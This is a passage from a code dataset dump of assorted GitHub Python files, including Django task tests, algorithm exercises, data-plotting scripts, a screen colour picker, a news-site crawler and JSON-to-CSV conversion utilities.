self.assertEqual(self.status.pk, 100)\n self.assertEqual(self.labels.pk, 1)\n\n def test_unauthorized(self):\n self.client.logout()\n response = self.client.get(reverse(\"tasks:task_list\"))\n self.assertEqual(response.status_code, 302)\n\n def test_task_page(self):\n response = self.client.get(reverse(\"tasks:task_list\"))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name=\"tasks/task_list.html\")\n\n def test_get_create_task(self):\n response = self.client.get(reverse(\"tasks:create_task\"))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name=\"tasks/create.html\")\n\n def test_post_create_task(self):\n new_task_create_data = {\n \"name\": \"name_test2\",\n \"description\": \"description for task_test2\",\n \"status\": self.status.pk,\n \"executor\": self.user.pk,\n \"labels\": self.labels.pk,\n }\n\n response = self.client.post(reverse(\"tasks:create_task\"), new_task_create_data)\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Task.objects.count(), 2)\n\n task = Task.objects.last()\n self.assertEqual(task.name, \"name_test2\")\n self.assertEqual(task.description, \"description for task_test2\")\n self.assertEqual(task.status.name, \"status_test\")\n self.assertEqual(task.executor.username, \"username_test\")\n self.assertEqual(task.author.username, \"username_test\")\n self.assertEqual(task.labels.all()[0].name, \"label_test\")\n\n def test_delete_task(self):\n response = self.client.get(\n reverse(\"tasks:delete_task\", kwargs={\"pk\": self.task.pk})\n )\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name=\"tasks/delete.html\")\n\n response = self.client.post(\n reverse(\"tasks:delete_task\", kwargs={\"pk\": self.task.pk})\n )\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Task.objects.count(), 0)\n\n def test_update_task(self):\n new_user = MyUser.objects.create(\n username=\"newbie\",\n first_name=\"new\",\n last_name=\"bie\",\n password=\"secret\",\n )\n\n new_label = Label.objects.create(name=\"new\")\n\n update_task_create_data = {\n \"name\": \"name_update2\",\n \"description\": \"description for task_update2\",\n \"status\": self.status.pk,\n \"executor\": new_user.pk,\n \"labels\": {self.labels.pk, new_label.pk},\n }\n\n response = self.client.get(\n reverse(\"tasks:update_task\", kwargs={\"pk\": self.task.pk}),\n )\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name=\"tasks/update.html\")\n\n response = self.client.post(\n reverse(\"tasks:update_task\", kwargs={\"pk\": self.task.pk}),\n update_task_create_data,\n )\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Task.objects.count(), 1)\n\n task = Task.objects.last()\n self.assertEqual(task.name, \"name_update2\")\n self.assertEqual(task.description, \"description for task_update2\")\n self.assertEqual(task.status.name, \"status_test\")\n self.assertEqual(task.author.username, \"username_test\")\n\n self.assertEqual(task.executor.pk, new_user.pk)\n\n self.assertEqual(task.labels.last().name, \"new\")\n self.assertEqual(task.labels.count(), 2)\n\n def test_detail_task(self):\n response = self.client.get(\n reverse(\"tasks:detail_task\", kwargs={\"pk\": self.task.pk})\n )\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name=\"tasks/detail.html\")\n","repo_name":"tommyqamaz/task-manager","sub_path":"task_manager/tasks/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"10906805469","text":"import itertools\n\nt = int(input())\nfor _ in range(t):\n l, k = [int(x) for x in input().strip().split(\" \")]\n a = [int(i) for i in input().split()]\n # x = eqavg(arr, k)\n b = list(itertools.permutations(a))\n for ele in range(len(b)):\n c1, c2, sum = 0, 0, 0\n for i in range(k):\n sum = sum + b[ele][i]\n m = sum / k\n for i in range(len(b[ele]) - k + 1):\n j = i\n sum = 0\n while j < (i + k):\n sum = sum + b[ele][j]\n j += 1\n c1+=1\n if (sum/k) == m:\n c2+=1\n if c1 == c2:\n print (\"YES\")\n print(' '.join(map(str, b[ele]))) \n break\n if c1 != c2:\n print(\"NO\")\n","repo_name":"muskankhedia/CompetitiveAnswers","sub_path":"CodeChef/permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"15999669430","text":"import os\nfrom pathlib import Path\n\nfrom pytorch_lightning import Trainer\nfrom pytorch_lightning.loggers import TensorBoardLogger\n\n\ndef get_data_dir():\n project_dir = str(Path(__file__).parent.parent.parent.absolute())\n path = os.path.join(project_dir, 'data')\n return path\n\n\ndef get_experiments_dir():\n project_dir = str(Path(__file__).parent.parent.parent.absolute())\n path = os.path.join(project_dir, 'experiments')\n return path\n\n\ndef prepare_logger(opts):\n ''' prepare logger using the given options '''\n logger = TensorBoardLogger(opts['logs_path'], name=opts['experiment_name'])\n return logger\n\n\ndef prepare_trainer(opts, logger=None):\n ''' prepare the trainer using the given options '''\n\n from src.options import trainer_optional_arguments\n trainer_args = dict((key, opts[key]) for key in trainer_optional_arguments if key in opts)\n\n trainer = Trainer(weights_summary='full', logger=logger, default_root_dir=opts['logs_path'], **trainer_args)\n\n return trainer","repo_name":"ACLab-BGU/nn-ambisonics-upscaler","sub_path":"src/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"73241175856","text":"import math\n\nclass Solution(object):\n def distributeCandies(self, candies, num_people):\n k, n = num_people, candies\n alloc = [0]*k\n Final = (0, 0)\n for i in range(1, k+1):\n s = ((-1-2*i) + math.sqrt(1+8*n)) / (2*k)\n t = math.floor(s)\n alloc[i-1] = i*(t+1) + k*t*(t+1)//2\n Final = max(Final, (s - math.floor(s), i))\n alloc[Final[1]-1] += (n - sum(alloc))\n return alloc\n\nif __name__ == \"__main__\":\n input = Solution()\n candies = 10\n num_people = 3\n\n check = input.distributeCandies(candies, num_people)\n print(check)","repo_name":"hiratekatayama/math_puzzle","sub_path":"leet/Distribute_Candies_to_People.py","file_name":"Distribute_Candies_to_People.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"11537475914","text":"import logging\nfrom simuvex.s_format import FormatParser\n\nl = logging.getLogger(\"simuvex.procedures.sprintf\")\n\n######################################\n# sprintf\n######################################\n\nclass sprintf(FormatParser):\n #pylint:disable=arguments-differ\n\n def run(self, dst_ptr):\n\n #additional code\n trace_data = (\"sprintf\", {\"dst_ptr\": (dst_ptr, dst_ptr.symbolic)})\n try:\n self.state.procedure_data.global_variables[\"trace\"].append(trace_data)\n except KeyError:\n self.state.procedure_data.global_variables[\"trace\"] = []\n self.state.procedure_data.global_variables[\"trace\"].append(trace_data)\n #end of additional code\n\n # The format str is at index 1\n fmt_str = self._parse(1)\n out_str = fmt_str.replace(2, self.arg)\n self.state.memory.store(dst_ptr, out_str)\n\n # place the terminating null byte\n self.state.memory.store(dst_ptr + (out_str.size() / 8), self.state.se.BVV(0, 8))\n\n # size_t has size arch.bits\n return self.state.se.BVV(out_str.size()/8, self.state.arch.bits)\n","repo_name":"Agnishom/SummerTrace","sub_path":"libc___so___6/sprintf.py","file_name":"sprintf.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"34243462005","text":"import cv2\n\nfrom GetScreen import GetScreen\nimport Processing\n\ndef main():\n\n while True:\n\n screen = GetScreen('TetrisOnline')\n processed_screen = Processing.ProcessImage(screen)\n cv2.imshow('window', processed_screen)\n\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n break\n\n\nmain()","repo_name":"jigarhira/DeepTetris","sub_path":"DeepTetris.py","file_name":"DeepTetris.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"12937088424","text":"from collections import Counter\n\ndef get_input_list():\n return [\"abcdef\", \"bababc\", \"abbcde\", \"abcccd\", \"aabcdd\", \"abcdee\", \"ababab\"]\n\ndef is_duplicate(string):\n\t\"\"\"Return true on first duplicate character in string\"\"\"\n\tdup_dic = Counter(string)\n\tfor key, value in dup_dic.items():\n\t\tif value == 2:\n\t\t\treturn True\n\treturn False\n\t\t\ndef is_triplicate(string):\n\t\"\"\"Return true on first triplicate character in string\"\"\"\n\ttri_dic = Counter(string)\n\tcount = 0\n\tfor key, value in tri_dic.items():\n\t\tif value == 3:\n\t\t\treturn True\n\treturn False\n\n\nif __name__ == \"__main__\":\n\n\tduplicate_count = 0\n\ttriplicate_count = 0\n\n\tinput_list = get_input_list()\n\n\tfor i in input_list:\n\t\tif is_duplicate(i):\n\t\t\tduplicate_count += 1\n\t\tif is_triplicate(i):\n\t\t\ttriplicate_count += 1\n\n\tprint(duplicate_count * triplicate_count)\n\n\n","repo_name":"SteveAmor/AdventOfCode2018","sub_path":"day2/day2_part1.py","file_name":"day2_part1.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"23825473986","text":"# -*- coding: utf-8 -*-\n# Author: Rowan\nimport json\nimport unittest\n\nfrom project import app\nfrom test import AUTH_HEADERS, DEFAULT_PATH\n\n\nclass TestHistory(unittest.TestCase):\n def testCreateHistory1(self):\n with app.test_client() as client:\n data = {\n \"food_id\": 2\n }\n res = client.post(DEFAULT_PATH.format('/history'), data=json.dumps(data), headers=AUTH_HEADERS)\n self.assertEqual(201, res.status_code)\n\n def testCreateHistory2(self):\n with app.test_client() as client:\n data = {\n \"food_id2\": 2\n }\n res = client.post(DEFAULT_PATH.format('/history'), data=json.dumps(data), headers=AUTH_HEADERS)\n self.assertEqual(401, res.status_code)\n\n def testCreateHistory3(self):\n with app.test_client() as client:\n data = {\n \"food_id\": 0\n }\n res = client.post(DEFAULT_PATH.format('/history'), data=json.dumps(data), headers=AUTH_HEADERS)\n self.assertEqual(402, res.status_code)\n\n def testGetListHistories(self):\n with app.test_client() as client:\n res = client.get(DEFAULT_PATH.format('/histories'), headers=AUTH_HEADERS)\n self.assertEqual(201, res.status_code)\n\n def testDeleteHistory(self):\n with app.test_client() as client:\n res = client.delete(DEFAULT_PATH.format('/history/10'), headers=AUTH_HEADERS)\n self.assertEqual(401, res.status_code)\n","repo_name":"baohoquoc/WIET","sub_path":"API/test/TestHistory.py","file_name":"TestHistory.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"69809751534","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nfrom scipy.optimize import curve_fit\nfrom uncertainties import ufloat\n\nv1, u1 = np.genfromtxt(\"integrator.csv\", delimiter=';', unpack=True)\nv2, u2 = np.genfromtxt(\"differentiator.csv\", delimiter=';', unpack=True)\n\n\ndef f(x, a, b):\n y=a*x**b\n return y\n\npopt1, pcov1 = curve_fit(f, v1[:12], u1[:12])\na1=ufloat(popt1[0], np.sqrt(np.diag(pcov1))[0])\nb1=ufloat(popt1[1], np.sqrt(np.diag(pcov1))[1])\nx1=np.linspace(40, 700, 1000)\n\npopt2, pcov2 = curve_fit(f, v2, u2)\na2=ufloat(popt2[0], np.sqrt(np.diag(pcov2))[0])\nb2=ufloat(popt2[1], np.sqrt(np.diag(pcov2))[1])\nx2=np.linspace(40, 1000, 1000)\n\nprint(\"Integrator\", a1, b1)\nprint(\"Differentiator\", a2, b2)\n\nplt.figure()\nplt.plot(v1, u1, \"x\", label=\"Data\")\nplt.plot(x1, f(x1, *popt1), label=\"Fit\")\nplt.xlabel(r\"$\\nu$ / Hz\")\nplt.ylabel(r\"$U_A$ / V\")\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.grid()\nplt.legend()\nplt.savefig(\"plot4.pdf\", bbox_inches=\"tight\")\n\nplt.figure()\nplt.plot(v2, u2, \"x\", label=\"Data\")\nplt.plot(x2, f(x2, *popt2), label=\"Fit\")\nplt.xlabel(r\"$\\nu$ / Hz\")\nplt.ylabel(r\"$U_A$ / V\")\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.grid()\nplt.legend()\nplt.savefig(\"plot5.pdf\", bbox_inches=\"tight\")\n\nplt.show()\n","repo_name":"NoKryst13/V51","sub_path":"intdiff.py","file_name":"intdiff.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"1637896687","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as fm\nimport urllib.request\nimport numpy as np\nimport squarify as squ\n\nfrom konlpy.tag import Mecab\nfrom wordcloud import WordCloud\n\nplt.style.use('seaborn-white')\n\nfontPath = 'C:/Windows/Fonts/NanumBarunGothic.ttf'\nfont = fm.FontProperties(fname=fontPath, size=10)\nplt.rc('font', family='NanumBarunGothic')\n\n\nraw = urllib.request.urlopen('https://raw.githubusercontent.com/e9t/nsmc/master/ratings.txt').readlines()\n\n# 한글변환\nraw = [x.decode() for x in raw[1:]]\nreviews = []\nfor i in raw:\n reviews.append(i.split('\\t')[1])\n# print (reviews[:5])\n\n# 형태소 분석을 이용한 명사 추출\ntagger = Mecab()\n\nnouns = []\nfor review in reviews:\n for noun in tagger.nouns(review):\n nouns.append(noun)\n#nouns[:10]\n\n# 불용어(Stopwords) 사전 만들기\nstop_words = \"영화 전 난 일 걸 뭐 줄 만 건 분 개 끝 잼 이거 번 중 듯 때 게 내 말 나 수 거 점 것\"\nstop_words = stop_words.split(' ')\n#print(stop_words)\n\n# 불용어를 제외하여 형태소 분석 수행\nnouns = []\nfor review in reviews:\n for noun in tagger.nouns(review):\n if noun not in stop_words:\n nouns.append(noun)\n#nouns[:10]\n\n# 단어 빈도수 측정\nfrom collections import Counter\n\nnouns_counter = Counter(nouns)\ntop_nouns = dict(nouns_counter.most_common(50))\n\ntop_nouns\n\n# 단어 빈도 시각화\ny_pos = np.arange(len(top_nouns))\n\nplt.figure(figsize=(12,12))\nplt.barh(y_pos, top_nouns.values())\nplt.title('Word Count')\nplt.yticks(y_pos, top_nouns.keys())\nplt.show()\n\n# WordCloud를 이용해 객체를 생성해주고, generate_from_frequencies() 함수로 빈도 수에 따라 워드클라우드 생성\n\nwc = WordCloud(background_color='white', font_path='./font/NanumBarunGothic.ttf')\nwc.generate_from_frequencies(top_nouns)\n\n# WordCloud 시각화 (이미지 시각화 함수인 imshow() 함수를 사용)\nfigure = plt.figure(figsize=(12,12))\nax = figure.add_subplot(1, 1, 1)\nax.axis('off')\nax.imshow(wc)\nplt.show()\n\n\n# squarify 트리맵 시각화\n\nnorm = mpl.colors.Normalize(vmin=min(top_nouns.values()),\n vmax=max(top_nouns.values()))\n\ncolors = [mpl.cm.Blues(norm(value)) for value in top_nouns.values()]\n\nsqu.plot(label=top_nouns.keys(),\n sizes=top_nouns.values(),\n color=colors,\n alpha=.7)\n\n\n\n\n","repo_name":"ds5cmm/selenium","sub_path":"Analysis/Keyword_Analysis.py","file_name":"Keyword_Analysis.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"29263513496","text":"# 参考: https://note.nkmk.me/python-bit-operation/\n# <<:左シフト演算子\n# >>:右シフト演算子\n\nN = 4\n\n# print(1<<4) # 16\n# print(bin(1<<4))\n# print('')\n\nfor i in range(1<>j))\n # print(1 & (i>>j)) # 2^0の位が0か1か判定\n if 1 & (i>>j):\n cond[j] = 1\n\n print(cond)","repo_name":"Toshiyana/atcoder_study","sub_path":"study_algorithm/bit_zentansaku/bit_zentansaku.py","file_name":"bit_zentansaku.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"5912104931","text":"name = input(\"Enter file:\")\nif len(name) < 1:\n name = \"mbox-short.txt\"\nhandle = open(name)\n\ncounts=dict()\nfor line in handle:\n line=line.rstrip()\n if not line.startswith('From '):\n continue\n line=line.split()\n emails=line[1]\n for email in emails.split():\n counts[email]=counts.get(email,0)+1\n \nMaxWord=None\nMaxCount=None \nfor key,value in counts.items():\n if MaxCount is None or value>MaxCount:\n MaxCount=value\n MaxWord=key\n \nprint(MaxWord,MaxCount)\n","repo_name":"AA19BD/PythonSummer","sub_path":"Coursera-Python/Python Data Structures/Week5/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"73791148654","text":"from Matchers.MatcherBase import MatcherBase\n\n\nclass WeightedMatcher(MatcherBase):\n def match_pair(self, taken, index, rankingMatrix, weights):\n availableRanking = [(i, r) for i, r in enumerate(\n rankingMatrix[index]) if not taken[i]]\n\n weightedMatches = [(i, self.__weightedMatch(\n index, i, r, rankingMatrix, weights)) for i, r in availableRanking]\n\n match = max(weightedMatches, key=lambda a: a[1])[0]\n\n return match\n\n def __weightedMatch(self, index, preferenceIndex, preference, rankingMatrix, weights):\n return preference * \\\n weights[index] + \\\n rankingMatrix[preferenceIndex][index] * \\\n weights[preferenceIndex]\n","repo_name":"GThibeault/ToddProblem","sub_path":"ToddProblem/src/Matchers/WeightedMatcher.py","file_name":"WeightedMatcher.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"10628172518","text":"import SimpleITK as sitk\r\nimport cv2\r\nimport numpy as np\r\n\r\n\r\ndef fill_outside(img: sitk.Image, value: int):\r\n img = sitk.GetArrayFromImage(img)\r\n img[0, 0] = 0\r\n mask = np.zeros((img.shape[0] + 2, img.shape[1] + 2), np.uint8)\r\n cv2.floodFill(img,\r\n mask,\r\n (0, 0), value, value, value, cv2.FLOODFILL_FIXED_RANGE)\r\n img[img.shape[0] - 1, 0] = 0\r\n cv2.floodFill(img,\r\n mask,\r\n (0, img.shape[0] - 1), value, value, value, cv2.FLOODFILL_FIXED_RANGE)\r\n img[img.shape[0] - 1, img.shape[1] - 1] = 0\r\n cv2.floodFill(img,\r\n mask,\r\n (img.shape[1] - 1, img.shape[0] - 1), value, value, value, cv2.FLOODFILL_FIXED_RANGE)\r\n img[0, img.shape[1] - 1] = 0\r\n cv2.floodFill(img,\r\n mask,\r\n (img.shape[1] - 1, 0), value, value, value, cv2.FLOODFILL_FIXED_RANGE)\r\n img = sitk.GetImageFromArray(img)\r\n return img","repo_name":"SMART-pipeline/Volume-reconstruction","sub_path":"VISoR_Reconstruction/reconstruction/brain_reconstruct_methods/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"56"} +{"seq_id":"1728146116","text":"# colorPicker.py\n# windows only\n\n\"\"\"\n\tA simple python application that allows you to pick colors on your screen.\n\t\n\t-> Keep the program running in the background\n\t-> Move your mouse cursor to anywhere on the screen.\n\t-> Hit the keyboard shortcut. (Default: CTRL + ALT + C)\n\t-> The color code (Hex by default) will then be available on your clipboard.\n\t-> It also shows up on the console application alongside it's RGB value.\n\"\"\"\n\nimport keyboard # to set up and listen to hotkeys.\nimport pyscreenshot # to take a screenshot. (duh)\nimport pyperclip # to copy color codes to clipboard.\nimport ctypes # to access cursor position.\nimport os # to clear screen and set window title.\n\nHOTKEY = \"ctrl+alt+c\"\n\ntry:\n\t# https://stackoverflow.com/a/32541666/11912727\n\t# for accurate cursor coordinates.\n\tctypes.windll.user32.SetProcessDPIAware()\nexcept AttributeError:\n\tpass # apparently it doesn't work on Windows XP.\n\t\nclass POINT(ctypes.Structure):\n\t_fields_ = [(\"x\", ctypes.c_long), (\"y\", ctypes.c_long)]\n\ndef get_position():\n\t\"\"\"Get current cursor position.\"\"\"\n\t\n\tcursor = POINT()\n\t# grab the position of the mouse cursor.\n\tctypes.windll.user32.GetCursorPos(ctypes.byref(cursor))\n\treturn (cursor.x, cursor.y)\n\ndef rgb2hex(rgb):\n\t\"\"\"To convert the RGB values to HEX.\"\"\"\n\t\n\tclamp = lambda x: max(0, min(x, 255))\n\treturn f\"#{clamp(rgb[0]):02x}{clamp(rgb[1]):02x}{clamp(rgb[2]):02x}\"\n\t\ndef get_color(coordX, coordY):\n\t\"\"\"To get the color of the pixel of a given coord on the screen.\"\"\"\n\t\n\tscreenie = pyscreenshot.grab() # take a screenshot.\n\timage = screenie.convert('RGB')\n\tr, g, b = image.getpixel((coordX, coordY)) # get the color of the pixel at the coords.\n\treturn (r, g, b)\n\ndef on_hotkey_press():\n\t\"\"\"Called when CTRL+ALT+C is pressed\"\"\"\n\t\n\tcursor_position = get_position()\n\tcolor = get_color(cursor_position[0], cursor_position[1])\n\thex_color = rgb2hex(color)\n\tprint(\"[Color Picked]\")\n\tprint(f\"Coordinates: X = {cursor_position[0]}, Y = {cursor_position[1]}\")\n\tprint(f\"RGB: {', '.join(str(i) for i in color)}\")\n\tprint(f\"HEX: {hex_color}\")\n\tprint()\n\tpyperclip.copy(hex_color) # copy the hex code to clipboard.\n\nkeyboard.add_hotkey(HOTKEY, on_hotkey_press) # set up the keyboard combo and hook it to the function.\nos.system('cls & title Screen Color Picker & color e')\nprint(f\"Point your mouse cursor at anywhere on the screen, hit {HOTKEY.upper()}\")\nprint(\"The HEX color code will be available on your clipboard. (Also printed here)\\n\")\nkeyboard.wait() # infinite blocking loop just to listen for the hotkey.","repo_name":"waterrmalann/screen-color-picker","sub_path":"color_picker.py","file_name":"color_picker.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"71764778416","text":"import pandas as pd\nfrom pandas import json_normalize\nimport json\nfrom tqdm import tqdm\nfrom os import path, mkdir\nfrom pathlib import Path\n\ndef create_dataset(input_file_name: str, output_file_name: str, input_column_name: list, output_column_name: list = None, index: bool = False) -> None:\n \"\"\"\n input_file_name (str): Input JSON file name\n output_file_name (str): Output CSV file name\n input_column_name (str): Filter input file based on the columns\n output_column_name (list): Rename input columns. None by default. Note: Passing 'None' will keep the same column names\n index (bool): Toggle index in output file. False (turned off) by default\n \"\"\"\n\n\n with open(input_file_name) as f:\n input_file_data: list = json.load(f)\n output_file_data: list = []\n\n if output_column_name is not None:\n if len(input_column_name) != len(output_column_name):\n print(\"Input-Output columns need to have same length and input columns must be not null!\")\n return\n else: output_column_name = input_column_name\n\n valid_columns: list = list(input_file_data[0].keys()) + [\"keywords.id\", \"keywords.name\", \"keywords.score\"]\n valid_columns.remove(\"keywords\")\n\n if \"affiliation\" in valid_columns:\n valid_columns.remove(\"affiliation\")\n valid_columns += [\"affiliation.id\", \"affiliation.name\", \"affiliation.photoUrl\"]\n\n if \"keywords\" in input_column_name:\n input_column_name.remove(\"keywords\")\n input_column_name += [\"keywords.id\", \"keywords.name\", \"keywords.score\"]\n\n if \"affiliation\" in input_column_name:\n input_column_name.remove(\"affiliation\")\n input_column_name += [\"affiliation.id\", \"affiliation.name\", \"affiliation.photoUrl\"]\n\n for col in input_column_name:\n if col not in valid_columns:\n print(f\"Input column [{col}] not found!\")\n print(\"Available columns are: [\" + \", \".join(valid_columns) + \"]\")\n return\n\n has_publications: bool = (\"publications\" in input_column_name)\n has_keywords: list = [\"keywords.id\" in input_column_name , \"keywords.name\" in input_column_name, \"keywords.score\" in input_column_name]\n has_affiliation: list = [\"affiliation.id\" in input_column_name , \"affiliation.name\" in input_column_name, \"affiliation.photoUrl\" in input_column_name]\n\n\n def get_data_from_record(record: dict) -> dict:\n data: dict = {}\n\n for c in input_column_name:\n try: data[c] = record[c]\n except KeyError: continue\n\n if has_affiliation[0]: data[\"affiliation.id\"] = record[\"affiliation\"][\"id\"]\n if has_affiliation[1]: data[\"affiliation.name\"] = record[\"affiliation\"][\"name\"]\n if has_affiliation[2]: data[\"affiliation.photoUrl\"] = record[\"affiliation\"][\"photoUrl\"]\n\n return data\n\n\n if has_publications and any(has_keywords):\n for record in tqdm(input_file_data, desc=\"Records Processed: \"):\n data: dict = get_data_from_record(record)\n\n for pid in record[\"publications\"]:\n for keyword in record[\"keywords\"]:\n temp_data: dict = data.copy()\n\n if has_keywords[0]: temp_data[\"keywords.id\"] = keyword[\"id\"]\n if has_keywords[1]: temp_data[\"keywords.name\"] = keyword[\"name\"]\n if has_keywords[2]: temp_data[\"keywords.score\"] = keyword[\"score\"]\n temp_data[\"publications\"] = pid\n\n output_file_data.append(temp_data)\n\n\n elif has_publications:\n for record in tqdm(input_file_data, desc=\"Records Processed: \"):\n data: dict = get_data_from_record(record)\n\n for pid in record[\"publications\"]:\n temp_data: dict = data.copy()\n temp_data[\"publications\"] = pid\n output_file_data.append(temp_data)\n\n\n elif any(has_keywords):\n for record in tqdm(input_file_data, desc=\"Records Processed: \"):\n data: dict = get_data_from_record(record)\n\n for keyword in record[\"keywords\"]:\n temp_data: dict = data.copy()\n\n if has_keywords[0]: temp_data[\"keywords.id\"] = keyword[\"id\"]\n if has_keywords[1]: temp_data[\"keywords.name\"] = keyword[\"name\"]\n if has_keywords[2]: temp_data[\"keywords.score\"] = keyword[\"score\"]\n\n output_file_data.append(temp_data)\n\n\n else:\n for record in tqdm(input_file_data, desc=\"Records Processed: \"):\n output_file_data.append(get_data_from_record(record))\n\n print(f\"Creating [{output_file_name}]... Note: This may take some time depending on the amount of data being extracted and computing power!\")\n json_normalize(output_file_data).drop_duplicates().rename(columns={c:cp for (c, cp) in zip(input_column_name, output_column_name)}).to_csv(output_file_name, index=index)\n print(\"Done!\")\n\n\ndef print_usage() -> None:\n print(\"USAGE 1: python ./create_dataset.py input_file output_file\")\n print('EXAMPLE 1: python ./create_dataset.py faculty.json faculty_all_atributes.csv\"\\n')\n print(\"USAGE 1: python ./create_dataset.py input_file output_file extract_columns\")\n print('EXAMPLE 1: python ./create_dataset.py faculty.json test1.csv \"id, researchInterest\"\\n')\n print(\"USAGE 2: python ./create_dataset.py input_file output_file extract_columns rename_extracted_columns\")\n print('EXAMPLE 2: python ./create_dataset.py faculty.json test2.csv \"id, researchInterest\" \"faculty_id, research_interest\"\\n')\n print(\"USAGE 3: python ./create_dataset.py input_file output_file extract_columns rename_extracted_columns indexing\")\n print('EXAMPLE 3: python ./create_dataset.py faculty.json test3.csv \"id, researchInterest\" \"faculty_id, research_interest\" True')\n\ndef create_full_dataset(filepath,output_file):\n with open(filepath) as f:\n data = json.load(f)\n df = json_normalize(data)\n df = df.replace(r'[^\\w\\s]|_', ' ', regex=True)\n df.to_csv(output_file, index=True)\n\n\ndef createDataset(argv):\n num_args = len(argv)\n\n try:\n if num_args == 2:\n create_full_dataset(argv[0], argv[1])\n elif num_args == 3:\n create_dataset(argv[0], argv[1], argv[2].replace(\" \", \"\").split(\",\"))\n elif num_args == 4:\n create_dataset(argv[0], argv[1], argv[2].replace(\" \", \"\").split(\",\"), argv[3].replace(\" \", \"\").split(\",\"))\n elif num_args == 5:\n create_dataset(argv[0], argv[1], argv[2].replace(\" \", \"\").split(\",\"), argv[3].replace(\" \", \"\").split(\",\"), bool(argv[4]))\n else:\n print(\"Please specify the correct number of args.\\n\")\n print_usage()\n except:\n print_usage() ","repo_name":"CS411DSO-SP23/Awesome-Academic-Mentor","sub_path":"utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"26146613045","text":"import json\nimport time\nimport requests\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\nfrom tqdm import tqdm\nfrom bs4 import BeautifulSoup\n\ndef scrape(site):\n #Add delays\n session = requests.Session()\n retry = Retry(connect=3, backoff_factor=0.5)\n adapter = HTTPAdapter(max_retries=retry)\n #Request the site\n response = requests.get(site)\n #Check for OK status code\n if response.status_code == 200:\n #Parse the site\n bs = BeautifulSoup(response.text, 'html.parser')\n #Get all 'a' tags\n links = bs.findAll('a')\n #Remove tags without 'href' attribute\n links_a = [l for l in links if l.has_attr('href')]\n #Store all links from 'href' in a list\n links_b = [l['href'] for l in links_a]\n #Only keep pages from the same site\n links_c = [l for l in links_b if 'https://www.bjpenn.com/mma-news/' in l]\n #Drop duplicates\n links_d = list(set(links_c))\n #Grab the 'body' tag and remove any 'style' and 'script' tags from it\n bs = bs.find('body')\n for data in bs(['style', 'script']):\n data.decompose()\n #Return list of links and texts from inside of 'body' tag\n return links_d, ' '.join(bs.stripped_strings)\n \n #Return empty list of links and empty text if there was an error\n return [], \"\"\n\n\nif __name__ == \"__main__\":\n links = ['https://www.bjpenn.com/mma-news/']\n data = {}\n index = 0\n max_links = 30000\n\n #Loop until we are out of links or reach our max\n for i in tqdm (range(max_links), desc=\"Scraping...\"):\n #If we run out of new links\n if(index >= len(links)):\n break;\n #Scrape current site\n new_links, html = scrape(links[index])\n #Append new links to the end of our list\n [links.append(l) for l in new_links if l not in links]\n #Save the current link and its html in the data\n data[links[index]] = html\n #Increment index\n index = index + 1\n \n #Save data into a file\n with open(\"data.json\", \"w\") as outfile:\n json.dump(data, outfile)","repo_name":"patrickfenn/Web-Crawler-Search-Engine","sub_path":"previous-versions/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"29712896825","text":"'''@file argtype_factory.py\ncontains the type factory'''\n\nfrom assist.tasks.argtypes.argtypes import Enumerable\n\ndef factory(type_element):\n '''creates a type based on the 